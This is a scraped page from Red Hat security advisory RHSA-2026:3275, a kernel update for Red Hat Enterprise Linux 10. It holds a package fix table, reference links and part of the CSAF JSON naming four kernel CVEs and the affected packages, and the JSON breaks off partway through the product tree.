| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2026:3275 | self |
| https://access.redhat.com/security/updates/classi… | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376377 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2407333 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2414482 | external |
| https://bugzilla.redhat.com/show_bug.cgi?id=2429065 | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-38206 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2376377 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-38206 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-38206 | external |
| https://lore.kernel.org/linux-cve-announce/202507… | external |
| https://access.redhat.com/security/cve/CVE-2025-40096 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2407333 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-40096 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-40096 | external |
| https://lore.kernel.org/linux-cve-announce/202510… | external |
| https://access.redhat.com/security/cve/CVE-2025-40168 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2414482 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-40168 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-40168 | external |
| https://lore.kernel.org/linux-cve-announce/202511… | external |
| https://access.redhat.com/security/cve/CVE-2025-68800 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2429065 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-68800 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-68800 | external |
| https://lore.kernel.org/linux-cve-announce/202601… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel is now available for Red Hat Enterprise Linux 10.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service (CVE-2025-38206)\n\n* kernel: drm/sched: Fix potential double free in drm_sched_job_add_resv_dependencies (CVE-2025-40096)\n\n* kernel: smc: Use __sk_dst_get() and dst_dev_rcu() in smc_clc_prfx_match() (CVE-2025-40168)\n\n* kernel: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (CVE-2025-68800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:3275",
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2376377",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376377"
},
{
"category": "external",
"summary": "2407333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407333"
},
{
"category": "external",
"summary": "2414482",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2414482"
},
{
"category": "external",
"summary": "2429065",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429065"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_3275.json"
}
],
"title": "Red Hat Security Advisory: kernel security update",
"tracking": {
"current_release_date": "2026-04-24T01:29:25+00:00",
"generator": {
"date": "2026-04-24T01:29:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:3275",
"initial_release_date": "2026-02-25T02:10:39+00:00",
"revision_history": [
{
"date": "2026-02-25T02:10:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-25T02:10:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-24T01:29:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux BaseOS (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux CodeReady Linux Builder (v. 10)",
"product_id": "CRB-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV (v. 10)",
"product_id": "NFV-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time (v. 10)",
"product": {
"name": "Red Hat Enterprise Linux Real Time (v. 10)",
"product_id": "RT-10.1.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:10.1"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-devel-matched@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-devel-matched@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
"name": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_id": "perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.39.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"product": {
